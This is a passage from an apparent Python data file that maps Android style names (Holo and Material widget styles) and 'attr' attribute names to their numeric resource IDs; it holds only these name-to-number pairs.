'Widget.Holo.Light.Spinner' : 16974035,
'Widget.Holo.Light.Tab' : 16974052,
'Widget.Holo.Light.TabWidget' : 16974037,
'Widget.Holo.Light.TextView' : 16974010,
'Widget.Holo.Light.TextView.SpinnerItem' : 16974042,
'Widget.Holo.Light.WebTextView' : 16974038,
'Widget.Holo.Light.WebView' : 16974039,
'Widget.Holo.ListPopupWindow' : 16973997,
'Widget.Holo.ListView' : 16973975,
'Widget.Holo.ListView.DropDown' : 16973970,
'Widget.Holo.MediaRouteButton' : 16974293,
'Widget.Holo.PopupMenu' : 16973998,
'Widget.Holo.PopupWindow' : 16973976,
'Widget.Holo.ProgressBar' : 16973977,
'Widget.Holo.ProgressBar.Horizontal' : 16973978,
'Widget.Holo.ProgressBar.Large' : 16973981,
'Widget.Holo.ProgressBar.Small' : 16973979,
'Widget.Holo.ProgressBar.Small.Title' : 16973980,
'Widget.Holo.RatingBar' : 16973983,
'Widget.Holo.RatingBar.Indicator' : 16973984,
'Widget.Holo.RatingBar.Small' : 16973985,
'Widget.Holo.ScrollView' : 16973987,
'Widget.Holo.SeekBar' : 16973982,
'Widget.Holo.Spinner' : 16973989,
'Widget.Holo.Tab' : 16974051,
'Widget.Holo.TabWidget' : 16973991,
'Widget.Holo.TextView' : 16973967,
'Widget.Holo.TextView.SpinnerItem' : 16973996,
'Widget.Holo.WebTextView' : 16973992,
'Widget.Holo.WebView' : 16973993,
'Widget.ImageButton' : 16973862,
'Widget.ImageWell' : 16973861,
'Widget.KeyboardView' : 16973911,
'Widget.ListPopupWindow' : 16973957,
'Widget.ListView' : 16973870,
'Widget.ListView.DropDown' : 16973872,
'Widget.ListView.Menu' : 16973873,
'Widget.ListView.White' : 16973871,
'Widget.Material' : 16974413,
'Widget.Material.ActionBar' : 16974414,
'Widget.Material.ActionBar.Solid' : 16974415,
'Widget.Material.ActionBar.TabBar' : 16974416,
'Widget.Material.ActionBar.TabText' : 16974417,
'Widget.Material.ActionBar.TabView' : 16974418,
'Widget.Material.ActionButton' : 16974419,
'Widget.Material.ActionButton.CloseMode' : 16974420,
'Widget.Material.ActionButton.Overflow' : 16974421,
'Widget.Material.ActionMode' : 16974422,
'Widget.Material.AutoCompleteTextView' : 16974423,
'Widget.Material.Button' : 16974424,
'Widget.Material.ButtonBar' : 16974431,
'Widget.Material.ButtonBar.AlertDialog' : 16974432,
'Widget.Material.Button.Borderless' : 16974425,
'Widget.Material.Button.Borderless.Colored' : 16974426,
'Widget.Material.Button.Borderless.Small' : 16974427,
'Widget.Material.Button.Inset' : 16974428,
'Widget.Material.Button.Small' : 16974429,
'Widget.Material.Button.Toggle' : 16974430,
'Widget.Material.CalendarView' : 16974433,
'Widget.Material.CheckedTextView' : 16974434,
'Widget.Material.CompoundButton.CheckBox' : 16974435,
'Widget.Material.CompoundButton.RadioButton' : 16974436,
'Widget.Material.CompoundButton.Star' : 16974437,
'Widget.Material.DatePicker' : 16974438,
'Widget.Material.DropDownItem' : 16974439,
'Widget.Material.DropDownItem.Spinner' : 16974440,
'Widget.Material.EditText' : 16974441,
'Widget.Material.ExpandableListView' : 16974442,
'Widget.Material.FastScroll' : 16974443,
'Widget.Material.GridView' : 16974444,
'Widget.Material.HorizontalScrollView' : 16974445,
'Widget.Material.ImageButton' : 16974446,
'Widget.Material.Light' : 16974478,
'Widget.Material.Light.ActionBar' : 16974479,
'Widget.Material.Light.ActionBar.Solid' : 16974480,
'Widget.Material.Light.ActionBar.TabBar' : 16974481,
'Widget.Material.Light.ActionBar.TabText' : 16974482,
'Widget.Material.Light.ActionBar.TabView' : 16974483,
'Widget.Material.Light.ActionButton' : 16974484,
'Widget.Material.Light.ActionButton.CloseMode' : 16974485,
'Widget.Material.Light.ActionButton.Overflow' : 16974486,
'Widget.Material.Light.ActionMode' : 16974487,
'Widget.Material.Light.AutoCompleteTextView' : 16974488,
'Widget.Material.Light.Button' : 16974489,
'Widget.Material.Light.ButtonBar' : 16974496,
'Widget.Material.Light.ButtonBar.AlertDialog' : 16974497,
'Widget.Material.Light.Button.Borderless' : 16974490,
'Widget.Material.Light.Button.Borderless.Colored' : 16974491,
'Widget.Material.Light.Button.Borderless.Small' : 16974492,
'Widget.Material.Light.Button.Inset' : 16974493,
'Widget.Material.Light.Button.Small' : 16974494,
'Widget.Material.Light.Button.Toggle' : 16974495,
'Widget.Material.Light.CalendarView' : 16974498,
'Widget.Material.Light.CheckedTextView' : 16974499,
'Widget.Material.Light.CompoundButton.CheckBox' : 16974500,
'Widget.Material.Light.CompoundButton.RadioButton' : 16974501,
'Widget.Material.Light.CompoundButton.Star' : 16974502,
'Widget.Material.Light.DatePicker' : 16974503,
'Widget.Material.Light.DropDownItem' : 16974504,
'Widget.Material.Light.DropDownItem.Spinner' : 16974505,
'Widget.Material.Light.EditText' : 16974506,
'Widget.Material.Light.ExpandableListView' : 16974507,
'Widget.Material.Light.FastScroll' : 16974508,
'Widget.Material.Light.GridView' : 16974509,
'Widget.Material.Light.HorizontalScrollView' : 16974510,
'Widget.Material.Light.ImageButton' : 16974511,
'Widget.Material.Light.ListPopupWindow' : 16974512,
'Widget.Material.Light.ListView' : 16974513,
'Widget.Material.Light.ListView.DropDown' : 16974514,
'Widget.Material.Light.MediaRouteButton' : 16974515,
'Widget.Material.Light.PopupMenu' : 16974516,
'Widget.Material.Light.PopupMenu.Overflow' : 16974517,
'Widget.Material.Light.PopupWindow' : 16974518,
'Widget.Material.Light.ProgressBar' : 16974519,
'Widget.Material.Light.ProgressBar.Horizontal' : 16974520,
'Widget.Material.Light.ProgressBar.Inverse' : 16974521,
'Widget.Material.Light.ProgressBar.Large' : 16974522,
'Widget.Material.Light.ProgressBar.Large.Inverse' : 16974523,
'Widget.Material.Light.ProgressBar.Small' : 16974524,
'Widget.Material.Light.ProgressBar.Small.Inverse' : 16974525,
'Widget.Material.Light.ProgressBar.Small.Title' : 16974526,
'Widget.Material.Light.RatingBar' : 16974527,
'Widget.Material.Light.RatingBar.Indicator' : 16974528,
'Widget.Material.Light.RatingBar.Small' : 16974529,
'Widget.Material.Light.ScrollView' : 16974530,
'Widget.Material.Light.SearchView' : 16974531,
'Widget.Material.Light.SeekBar' : 16974532,
'Widget.Material.Light.SegmentedButton' : 16974533,
'Widget.Material.Light.Spinner' : 16974535,
'Widget.Material.Light.Spinner.Underlined' : 16974536,
'Widget.Material.Light.StackView' : 16974534,
'Widget.Material.Light.Tab' : 16974537,
'Widget.Material.Light.TabWidget' : 16974538,
'Widget.Material.Light.TextView' : 16974539,
'Widget.Material.Light.TextView.SpinnerItem' : 16974540,
'Widget.Material.Light.TimePicker' : 16974541,
'Widget.Material.Light.WebTextView' : 16974542,
'Widget.Material.Light.WebView' : 16974543,
'Widget.Material.ListPopupWindow' : 16974447,
'Widget.Material.ListView' : 16974448,
'Widget.Material.ListView.DropDown' : 16974449,
'Widget.Material.MediaRouteButton' : 16974450,
'Widget.Material.PopupMenu' : 16974451,
'Widget.Material.PopupMenu.Overflow' : 16974452,
'Widget.Material.PopupWindow' : 16974453,
'Widget.Material.ProgressBar' : 16974454,
'Widget.Material.ProgressBar.Horizontal' : 16974455,
'Widget.Material.ProgressBar.Large' : 16974456,
'Widget.Material.ProgressBar.Small' : 16974457,
'Widget.Material.ProgressBar.Small.Title' : 16974458,
'Widget.Material.RatingBar' : 16974459,
'Widget.Material.RatingBar.Indicator' : 16974460,
'Widget.Material.RatingBar.Small' : 16974461,
'Widget.Material.ScrollView' : 16974462,
'Widget.Material.SearchView' : 16974463,
'Widget.Material.SeekBar' : 16974464,
'Widget.Material.SegmentedButton' : 16974465,
'Widget.Material.Spinner' : 16974467,
'Widget.Material.Spinner.Underlined' : 16974468,
'Widget.Material.StackView' : 16974466,
'Widget.Material.Tab' : 16974469,
'Widget.Material.TabWidget' : 16974470,
'Widget.Material.TextView' : 16974471,
'Widget.Material.TextView.SpinnerItem' : 16974472,
'Widget.Material.TimePicker' : 16974473,
'Widget.Material.Toolbar' : 16974474,
'Widget.Material.Toolbar.Button.Navigation' : 16974475,
'Widget.Material.WebTextView' : 16974476,
'Widget.Material.WebView' : 16974477,
'Widget.PopupMenu' : 16973958,
'Widget.PopupWindow' : 16973878,
'Widget.ProgressBar' : 16973852,
'Widget.ProgressBar.Horizontal' : 16973855,
'Widget.ProgressBar.Inverse' : 16973915,
'Widget.ProgressBar.Large' : 16973853,
'Widget.ProgressBar.Large.Inverse' : 16973916,
'Widget.ProgressBar.Small' : 16973854,
'Widget.ProgressBar.Small.Inverse' : 16973917,
'Widget.RatingBar' : 16973857,
'Widget.ScrollView' : 16973869,
'Widget.SeekBar' : 16973856,
'Widget.Spinner' : 16973864,
'Widget.Spinner.DropDown' : 16973955,
'Widget.StackView' : 16974310,
'Widget.TabWidget' : 16973876,
'Widget.TextView' : 16973858,
'Widget.TextView.PopupMenu' : 16973865,
'Widget.TextView.SpinnerItem' : 16973866,
'Widget.Toolbar' : 16974311,
'Widget.Toolbar.Button.Navigation' : 16974312,
'Widget.WebView' : 16973875,
},
'attr': {
'theme' : 16842752,
'label' : 16842753,
'icon' : 16842754,
'name' : 16842755,
'manageSpaceActivity' : 16842756,
'allowClearUserData' : 16842757,
'permission' : 16842758,
'readPermission' : 16842759,
'writePermission' : 16842760,
'protectionLevel' : 16842761,
'permissionGroup' : 16842762,
'sharedUserId' : 16842763,
'hasCode' : 16842764,
'persistent' : 16842765,
'enabled' : 16842766,
'debuggable' : 16842767,
'exported' : 16842768,
'process' : 16842769,
'taskAffinity' : 16842770,
'multiprocess' : 16842771,
'finishOnTaskLaunch' : 16842772,
'clearTaskOnLaunch' : 16842773,
'stateNotNeeded' : 16842774,
'excludeFromRecents' : 16842775,
'authorities' : 16842776,
'syncable' : 16842777,
'initOrder' : 16842778,
'grantUriPermissions' : 16842779,
'priority' : 16842780,
'launchMode' : 16842781,
'screenOrientation' : 16842782,
'configChanges' : 16842783,
'description' : 16842784,
'targetPackage' : 16842785,
'handleProfiling' : 16842786,
'functionalTest' : 16842787,
'value' : 16842788,
'resource' : 16842789,
'mimeType' : 16842790,
'scheme' : 16842791,
'host' : 16842792,
'port' : 16842793,
'path' : 16842794,
'pathPrefix' : 16842795,
'pathPattern' : 16842796,
'action' : 16842797,
'data' : 16842798,
'targetClass' : 16842799,
'colorForeground' : 16842800,
'colorBackground' : 16842801,
'backgroundDimAmount' : 16842802,
'disabledAlpha' : 16842803,
'textAppearance' : 16842804,
'textAppearanceInverse' : 16842805,
'textColorPrimary' : 16842806,
'textColorPrimaryDisableOnly' : 16842807,
'textColorSecondary' : 16842808,
'textColorPrimaryInverse' : 16842809,
'textColorSecondaryInverse' : 16842810,
'textColorPrimaryNoDisable' : 16842811,
'textColorSecondaryNoDisable' : 16842812,
'textColorPrimaryInverseNoDisable' : 16842813,
'textColorSecondaryInverseNoDisable' : 16842814,
'textColorHintInverse' : 16842815,
'textAppearanceLarge' : 16842816,
'textAppearanceMedium' : 16842817,
'textAppearanceSmall' : 16842818,
'textAppearanceLargeInverse' : 16842819,
'textAppearanceMediumInverse' : 16842820,
'textAppearanceSmallInverse' : 16842821,
'textCheckMark' : 16842822,
'textCheckMarkInverse' : 16842823,
'buttonStyle' : 16842824,
'buttonStyleSmall' : 16842825,
'buttonStyleInset' : 16842826,
'buttonStyleToggle' : 16842827,
'galleryItemBackground' : 16842828,
'listPreferredItemHeight' : 16842829,
'expandableListPreferredItemPaddingLeft' : 16842830,
'expandableListPreferredChildPaddingLeft' : 16842831,
'expandableListPreferredItemIndicatorLeft' : 16842832,
'expandableListPreferredItemIndicatorRight' : 16842833,
'expandableListPreferredChildIndicatorLeft' : 16842834,
'expandableListPreferredChildIndicatorRight' : 16842835,
'windowBackground' : 16842836,
'windowFrame' : 16842837,
'windowNoTitle' : 16842838,
'windowIsFloating' : 16842839,
'windowIsTranslucent' : 16842840,
'windowContentOverlay' : 16842841,
'windowTitleSize' : 16842842,
'windowTitleStyle' : 16842843,
'windowTitleBackgroundStyle' : 16842844,
'alertDialogStyle' : 16842845,
'panelBackground' : 16842846,
'panelFullBackground' : 16842847,
'panelColorForeground' : 16842848,
'panelColorBackground' : 16842849,
'panelTextAppearance' : 16842850,
'scrollbarSize' : 16842851,
'scrollbarThumbHorizontal' : 16842852,
'scrollbarThumbVertical' : 16842853,
'scrollbarTrackHorizontal' : 16842854,
'scrollbarTrackVertical' : 16842855,
'scrollbarAlwaysDrawHorizontalTrack' : 16842856,
'scrollbarAlwaysDrawVerticalTrack' : 16842857,
'absListViewStyle' : 16842858,
'autoCompleteTextViewStyle' : 16842859,
'checkboxStyle' : 16842860,
'dropDownListViewStyle' : 16842861,
'editTextStyle' : 16842862,
'expandableListViewStyle' : 16842863,
'galleryStyle' : 16842864,
'gridViewStyle' : 16842865,
'imageButtonStyle' : 16842866,
'imageWellStyle' : 16842867,
'listViewStyle' : 16842868,
'listViewWhiteStyle' : 16842869,
'popupWindowStyle' : 16842870,
'progressBarStyle' : 16842871,
'progressBarStyleHorizontal' : 16842872,
'progressBarStyleSmall' : 16842873,
'progressBarStyleLarge' : 16842874,
'seekBarStyle' : 16842875,
'ratingBarStyle' : 16842876,
'ratingBarStyleSmall' : 16842877,
'radioButtonStyle' : 16842878,
'scrollbarStyle' : 16842879,
'scrollViewStyle' : 16842880,
'spinnerStyle' : 16842881,
'starStyle' : 16842882,
'tabWidgetStyle' : 16842883,
'textViewStyle' : 16842884,
'webViewStyle' : 16842885,
'dropDownItemStyle' : 16842886,
'spinnerDropDownItemStyle' : 16842887,
'dropDownHintAppearance' : 16842888,
'spinnerItemStyle' : 16842889,
'mapViewStyle' : 16842890,
'preferenceScreenStyle' : 16842891,
'preferenceCategoryStyle' : 16842892,
'preferenceInformationStyle' : 16842893,
'preferenceStyle' : 16842894,
'checkBoxPreferenceStyle' : 16842895,
'yesNoPreferenceStyle' : 16842896,
'dialogPreferenceStyle' : 16842897,
'editTextPreferenceStyle' : 16842898,
'ringtonePreferenceStyle' : 16842899,
'preferenceLayoutChild' : 16842900,
'textSize' : 16842901,
'typeface' : 16842902,
'textStyle' : 16842903,
'textColor' : 16842904,
'textColorHighlight' : 16842905,
'textColorHint' : 16842906,
'textColorLink' : 16842907,
'state_focused' : 16842908,
'state_window_focused' : 16842909,
'state_enabled' : 16842910,
'state_checkable' : 16842911,
'state_checked' : 16842912,
'state_selected' : 16842913,
'state_active' : 16842914,
'state_single' : 16842915,
'state_first' : 16842916,
'state_middle' : 16842917,
'state_last' : 16842918,
'state_pressed' : 16842919,
'state_expanded' : 16842920,
'state_empty' : 16842921,
'state_above_anchor' : 16842922,
'ellipsize' : 16842923,
'x' : 16842924,
'y' : 16842925,
'windowAnimationStyle' : 16842926,
'gravity' : 16842927,
'autoLink' : 16842928,
'linksClickable' : 16842929,
'entries' : 16842930,
'layout_gravity' : 16842931,
'windowEnterAnimation' : 16842932,
'windowExitAnimation' : 16842933,
'windowShowAnimation' : 16842934,
'windowHideAnimation' : 16842935,
'activityOpenEnterAnimation' : 16842936,
'activityOpenExitAnimation' : 16842937,
'activityCloseEnterAnimation' : 16842938,
'activityCloseExitAnimation' : 16842939,
'taskOpenEnterAnimation' : 16842940,
'taskOpenExitAnimation' : 16842941,
'taskCloseEnterAnimation' : 16842942,
'taskCloseExitAnimation' : 16842943,
'taskToFrontEnterAnimation' : 16842944,
'taskToFrontExitAnimation' : 16842945,
'taskToBackEnterAnimation' : 16842946,
'taskToBackExitAnimation' : 16842947,
'orientation' : 16842948,
'keycode' : 16842949,
'fullDark' : 16842950,
'topDark' : 16842951,
'centerDark' : 16842952,
'bottomDark' : 16842953,
'fullBright' : 16842954,
'topBright' : 16842955,
'centerBright' : 16842956,
'bottomBright' : 16842957,
'bottomMedium' : 16842958,
'centerMedium' : 16842959,
'id' : 16842960,
'tag' : 16842961,
'scrollX' : 16842962,
'scrollY' : 16842963,
'background' : 16842964,
'padding' : 16842965,
'paddingLeft' : 16842966,
'paddingTop' : 16842967,
'paddingRight' : 16842968,
'paddingBottom' : 16842969,
'focusable' : 16842970,
'focusableInTouchMode' : 16842971,
'visibility' : 16842972,
'fitsSystemWindows' : 16842973,
'scrollbars' : 16842974,
'fadingEdge' : 16842975,
'fadingEdgeLength' : 16842976,
'nextFocusLeft' : 16842977,
'nextFocusRight' : 16842978,
'nextFocusUp' : 16842979,
'nextFocusDown' : 16842980,
'clickable' : 16842981,
'longClickable' : 16842982,
'saveEnabled' : 16842983,
'drawingCacheQuality' : 16842984,
'duplicateParentState' : 16842985,
'clipChildren' : 16842986,
'clipToPadding' : 16842987,
'layoutAnimation' : 16842988,
'animationCache' : 16842989,
'persistentDrawingCache' : 16842990,
'alwaysDrawnWithCache' : 16842991,
'addStatesFromChildren' : 16842992,
'descendantFocusability' : 16842993,
'layout' : 16842994,
'inflatedId' : 16842995,
'layout_width' : 16842996,
'layout_height' : 16842997,
'layout_margin' : 16842998,
'layout_marginLeft' : 16842999,
'layout_marginTop' : 16843000,
'layout_marginRight' : 16843001,
'layout_marginBottom' : 16843002,
'listSelector' : 16843003,
'drawSelectorOnTop' : 16843004,
'stackFromBottom' : 16843005,
'scrollingCache' : 16843006,
'textFilterEnabled' : 16843007,
'transcriptMode' : 16843008,
'cacheColorHint' : 16843009,
'dial' : 16843010,
'hand_hour' : 16843011,
'hand_minute' : 16843012,
'format' : 16843013,
'checked' : 16843014,
'button' : 16843015,
'checkMark' : 16843016,
'foreground' : 16843017,
'measureAllChildren' : 16843018,
'groupIndicator' : 16843019,
'childIndicator' : 16843020,
'indicatorLeft' : 16843021,
'indicatorRight' : 16843022,
'childIndicatorLeft' : 16843023,
'childIndicatorRight' : 16843024,
'childDivider' : 16843025,
'animationDuration' : 16843026,
'spacing' : 16843027,
'horizontalSpacing' : 16843028,
'verticalSpacing' : 16843029,
'stretchMode' : 16843030,
'columnWidth' : 16843031,
'numColumns' : 16843032,
'src' : 16843033,
'antialias' : 16843034,
'filter' : 16843035,
'dither' : 16843036,
'scaleType' : 16843037,
'adjustViewBounds' : 16843038,
'maxWidth' : 16843039,
'maxHeight' : 16843040,
'tint' : 16843041,
'baselineAlignBottom' : 16843042,
'cropToPadding' : 16843043,
'textOn' : 16843044,
'textOff' : 16843045,
'baselineAligned' : 16843046,
'baselineAlignedChildIndex' : 16843047,
'weightSum' : 16843048,
'divider' : 16843049,
'dividerHeight' : 16843050,
'choiceMode' : 16843051,
'itemTextAppearance' : 16843052,
'horizontalDivider' : 16843053,
'verticalDivider' : 16843054,
'headerBackground' : 16843055,
'itemBackground' : 16843056,
'itemIconDisabledAlpha' : 16843057,
'rowHeight' : 16843058,
'maxRows' : 16843059,
'maxItemsPerRow' : 16843060,
'moreIcon' : 16843061,
'max' : 16843062,
'progress' : 16843063,
'secondaryProgress' : 16843064,
'indeterminate' : 16843065,
'indeterminateOnly' : 16843066,
'indeterminateDrawable' : 16843067,
'progressDrawable' : 16843068,
'indeterminateDuration' : 16843069,
'indeterminateBehavior' : 16843070,
'minWidth' : 16843071,
'minHeight' : 16843072,
'interpolator' : 16843073,
'thumb' : 16843074,
'thumbOffset' : 16843075,
'numStars' : 16843076,
'rating' : 16843077,
'stepSize' : 16843078,
'isIndicator' : 16843079,
'checkedButton' : 16843080,
'stretchColumns' : 16843081,
'shrinkColumns' : 16843082,
'collapseColumns' : 16843083,
'layout_column' : 16843084,
'layout_span' : 16843085,
'bufferType' : 16843086,
'text' : 16843087,
'hint' : 16843088,
'textScaleX' : 16843089,
'cursorVisible' : 16843090,
'maxLines' : 16843091,
'lines' : 16843092,
'height' : 16843093,
'minLines' : 16843094,
'maxEms' : 16843095,
'ems' : 16843096,
'width' : 16843097,
'minEms' : 16843098,
'scrollHorizontally' : 16843099,
'password' : 16843100,
'singleLine' : 16843101,
'selectAllOnFocus' : 16843102,
'includeFontPadding' : 16843103,
'maxLength' : 16843104,
'shadowColor' : 16843105,
'shadowDx' : 16843106,
'shadowDy' : 16843107,
'shadowRadius' : 16843108,
'numeric' : 16843109,
'digits' : 16843110,
'phoneNumber' : 16843111,
'inputMethod' : 16843112,
'capitalize' : 16843113,
'autoText' : 16843114,
'editable' : 16843115,
'freezesText' : 16843116,
'drawableTop' : 16843117,
'drawableBottom' : 16843118,
'drawableLeft' : 16843119,
'drawableRight' : 16843120,
'drawablePadding' : 16843121,
'completionHint' : 16843122,
'completionHintView' : 16843123,
'completionThreshold' : 16843124,
'dropDownSelector' : 16843125,
'popupBackground' : 16843126,
'inAnimation' : 16843127,
'outAnimation' : 16843128,
'flipInterval' : 16843129,
'fillViewport' : 16843130,
'prompt' : 16843131,
'startYear' : 16843132,
'endYear' : 16843133,
'mode' : 16843134,
'layout_x' : 16843135,
'layout_y' : 16843136,
'layout_weight' : 16843137,
'layout_toLeftOf' : 16843138,
'layout_toRightOf' : 16843139,
'layout_above' : 16843140,
'layout_below' : 16843141,
'layout_alignBaseline' : 16843142,
'layout_alignLeft' : 16843143,
'layout_alignTop' : 16843144,
'layout_alignRight' : 16843145,
'layout_alignBottom' : 16843146,
'layout_alignParentLeft' : 16843147,
'layout_alignParentTop' : 16843148,
'layout_alignParentRight' : 16843149,
'layout_alignParentBottom' : 16843150,
'layout_centerInParent' : 16843151,
'layout_centerHorizontal' : 16843152,
'layout_centerVertical' : 16843153,
'layout_alignWithParentIfMissing' : 16843154,
'layout_scale' : 16843155,
'visible' : 16843156,
'variablePadding' : 16843157,
'constantSize' : 16843158,
'oneshot' : 16843159,
'duration' : 16843160,
'drawable' : 16843161,
'shape' : 16843162,
'innerRadiusRatio' : 16843163,
'thicknessRatio' : 16843164,
'startColor' : 16843165,
'endColor' : 16843166,
'useLevel' : 16843167,
'angle' : 16843168,
'type' : 16843169,
'centerX' : 16843170,
'centerY' : 16843171,
'gradientRadius' : 16843172,
'color' : 16843173,
'dashWidth' : 16843174,
'dashGap' : 16843175,
'radius' : 16843176,
'topLeftRadius' : 16843177,
'topRightRadius' : 16843178,
'bottomLeftRadius' : 16843179,
'bottomRightRadius' : 16843180,
'left' : 16843181,
'top' : 16843182,
'right' : 16843183,
'bottom' : 16843184,
'minLevel' : 16843185,
'maxLevel' : 16843186,
'fromDegrees' : 16843187,
'toDegrees' : 16843188,
'pivotX' : 16843189,
'pivotY' : 16843190,
'insetLeft' : 16843191,
'insetRight' : 16843192,
'insetTop' : 16843193,
'insetBottom' : 16843194,
'shareInterpolator' : 16843195,
'fillBefore' : 16843196,
'fillAfter' : 16843197,
'startOffset' : 16843198,
'repeatCount' : 16843199,
'repeatMode' : 16843200,
'zAdjustment' : 16843201,
'fromXScale' : 16843202,
'toXScale' : 16843203,
'fromYScale' : 16843204,
'toYScale' : 16843205,
'fromXDelta' : 16843206,
'toXDelta' : 16843207,
'fromYDelta' : 16843208,
'toYDelta' : 16843209,
'fromAlpha' : 16843210,
'toAlpha' : 16843211,
'delay' : 16843212,
'animation' : 16843213,
'animationOrder' : 16843214,
'columnDelay' : 16843215,
'rowDelay' : 16843216,
'direction' : 16843217,
'directionPriority' : 16843218,
'factor' : 16843219,
'cycles' : 16843220,
'searchMode' : 16843221,
'searchSuggestAuthority' : 16843222,
'searchSuggestPath' : 16843223,
'searchSuggestSelection' : 16843224,
'searchSuggestIntentAction' : 16843225,
'searchSuggestIntentData' : 16843226,
'queryActionMsg' : 16843227,
'suggestActionMsg' : 16843228,
'suggestActionMsgColumn' : 16843229,
'menuCategory' : 16843230,
'orderInCategory' : 16843231,
'checkableBehavior' : 16843232,
'title' : 16843233,
'titleCondensed' : 16843234,
'alphabeticShortcut' : 16843235,
'numericShortcut' : 16843236,
'checkable' : 16843237,
'selectable' : 16843238,
'orderingFromXml' : 16843239,
'key' : 16843240,
'summary' : 16843241,
'order' : 16843242,
'widgetLayout' : 16843243,
'dependency' : 16843244,
'defaultValue' : 16843245,
'shouldDisableView' : 16843246,
'summaryOn' : 16843247,
'summaryOff' : 16843248,
'disableDependentsState' : 16843249,
'dialogTitle' : 16843250,
'dialogMessage' : 16843251,
'dialogIcon' : 16843252,
'positiveButtonText' : 16843253,
'negativeButtonText' : 16843254,
'dialogLayout' : 16843255,
'entryValues' : 16843256,
'ringtoneType' : 16843257,
'showDefault' : 16843258,
'showSilent' : 16843259,
'scaleWidth' : 16843260,
'scaleHeight' : 16843261,
'scaleGravity' : 16843262,
'ignoreGravity' : 16843263,
'foregroundGravity' : 16843264,
'tileMode' : 16843265,
'targetActivity' : 16843266,
'alwaysRetainTaskState' : 16843267,
'allowTaskReparenting' : 16843268,
'searchButtonText' : 16843269,
'colorForegroundInverse' : 16843270,
'textAppearanceButton' : 16843271,
'listSeparatorTextViewStyle' : 16843272,
'streamType' : 16843273,
'clipOrientation' : 16843274,
'centerColor' : 16843275,
'minSdkVersion' : 16843276,
'windowFullscreen' : 16843277,
'unselectedAlpha' : 16843278,
'progressBarStyleSmallTitle' : 16843279,
'ratingBarStyleIndicator' : 16843280,
'apiKey' : 16843281,
'textColorTertiary' : 16843282,
'textColorTertiaryInverse' : 16843283,
'listDivider' : 16843284,
'soundEffectsEnabled' : 16843285,
'keepScreenOn' : 16843286,
'lineSpacingExtra' : 16843287,
'lineSpacingMultiplier' : 16843288,
'listChoiceIndicatorSingle' : 16843289,
'listChoiceIndicatorMultiple' : 16843290,
'versionCode' : 16843291,
'versionName' : 16843292,
'marqueeRepeatLimit' : 16843293,
'windowNoDisplay' : 16843294,
'backgroundDimEnabled' : 16843295,
'inputType' : 16843296,
'isDefault' : 16843297,
'windowDisablePreview' : 16843298,
'privateImeOptions' : 16843299,
'editorExtras' : 16843300,
'settingsActivity' : 16843301,
'fastScrollEnabled' : 16843302,
'reqTouchScreen' : 16843303,
'reqKeyboardType' : 16843304,
'reqHardKeyboard' : 16843305,
'reqNavigation' : 16843306,
'windowSoftInputMode' : 16843307,
'imeFullscreenBackground' : 16843308,
'noHistory' : 16843309,
'headerDividersEnabled' : 16843310,
'footerDividersEnabled' : 16843311,
'candidatesTextStyleSpans' : 16843312,
'smoothScrollbar' : 16843313,
'reqFiveWayNav' : 16843314,
'keyBackground' : 16843315,
'keyTextSize' : 16843316,
'labelTextSize' : 16843317,
'keyTextColor' : 16843318,
'keyPreviewLayout' : 16843319,
'keyPreviewOffset' : 16843320,
'keyPreviewHeight' : 16843321,
'verticalCorrection' : 16843322,
'popupLayout' : 16843323,
'state_long_pressable' : 16843324,
'keyWidth' : 16843325,
'keyHeight' : 16843326,
'horizontalGap' : 16843327,
'verticalGap' : 16843328,
'rowEdgeFlags' : 16843329,
'codes' : 16843330,
'popupKeyboard' : 16843331,
'popupCharacters' : 16843332,
'keyEdgeFlags' : 16843333,
'isModifier' : 16843334,
'isSticky' : 16843335,
'isRepeatable' : 16843336,
'iconPreview' : 16843337,
'keyOutputText' : 16843338,
'keyLabel' : 16843339,
'keyIcon' : 16843340,
'keyboardMode' : 16843341,
'isScrollContainer' : 16843342,
'fillEnabled' : 16843343,
'updatePeriodMillis' : 16843344,
'initialLayout' : 16843345,
'voiceSearchMode' : 16843346,
'voiceLanguageModel' : 16843347,
'voicePromptText' : 16843348,
'voiceLanguage' : 16843349,
'voiceMaxResults' : 16843350,
'bottomOffset' : 16843351,
'topOffset' : 16843352,
'allowSingleTap' : 16843353,
'handle' : 16843354,
'content' : 16843355,
'animateOnClick' : 16843356,
'configure' : 16843357,
'hapticFeedbackEnabled' : 16843358,
'innerRadius' : 16843359,
'thickness' : 16843360,
'sharedUserLabel' : 16843361,
'dropDownWidth' : 16843362,
'dropDownAnchor' : 16843363,
'imeOptions' : 16843364,
'imeActionLabel' : 16843365,
'imeActionId' : 16843366,
'imeExtractEnterAnimation' : 16843368,
'imeExtractExitAnimation' : 16843369,
'tension' : 16843370,
'extraTension' : 16843371,
'anyDensity' : 16843372,
'searchSuggestThreshold' : 16843373,
'includeInGlobalSearch' : 16843374,
'onClick' : 16843375,
'targetSdkVersion' : 16843376,
'maxSdkVersion' : 16843377,
'testOnly' : 16843378,
'contentDescription' : 16843379,
'gestureStrokeWidth' : 16843380,
'gestureColor' : 16843381,
'uncertainGestureColor' : 16843382,
'fadeOffset' : 16843383,
'fadeDuration' : 16843384,
'gestureStrokeType' : 16843385,
'gestureStrokeLengthThreshold' : 16843386,
'gestureStrokeSquarenessThreshold' : 16843387,
'gestureStrokeAngleThreshold' : 16843388,
'eventsInterceptionEnabled' : 16843389,
'fadeEnabled' : 16843390,
'backupAgent' : 16843391,
'allowBackup' : 16843392,
'glEsVersion' : 16843393,
'queryAfterZeroResults' : 16843394,
'dropDownHeight' : 16843395,
'smallScreens' : 16843396,
'normalScreens' : 16843397,
'largeScreens' : 16843398,
'progressBarStyleInverse' : 16843399,
'progressBarStyleSmallInverse' : 16843400,
'progressBarStyleLargeInverse' : 16843401,
'searchSettingsDescription' : 16843402,
'textColorPrimaryInverseDisableOnly' : 16843403,
'autoUrlDetect' : 16843404,
'resizeable' : 16843405,
'required' : 16843406,
'accountType' : 16843407,
'contentAuthority' : 16843408,
'userVisible' : 16843409,
'windowShowWallpaper' : 16843410,
'wallpaperOpenEnterAnimation' : 16843411,
'wallpaperOpenExitAnimation' : 16843412,
'wallpaperCloseEnterAnimation' : 16843413,
'wallpaperCloseExitAnimation' : 16843414,
'wallpaperIntraOpenEnterAnimation' : 16843415,
'wallpaperIntraOpenExitAnimation' : 16843416,
'wallpaperIntraCloseEnterAnimation' : 16843417,
'wallpaperIntraCloseExitAnimation' : 16843418,
'supportsUploading' : 16843419,
'killAfterRestore' : 16843420,
'restoreNeedsApplication' : 16843421,
'smallIcon' : 16843422,
'accountPreferences' : 16843423,
'textAppearanceSearchResultSubtitle' : 16843424,
'textAppearanceSearchResultTitle' : 16843425,
'summaryColumn' : 16843426,
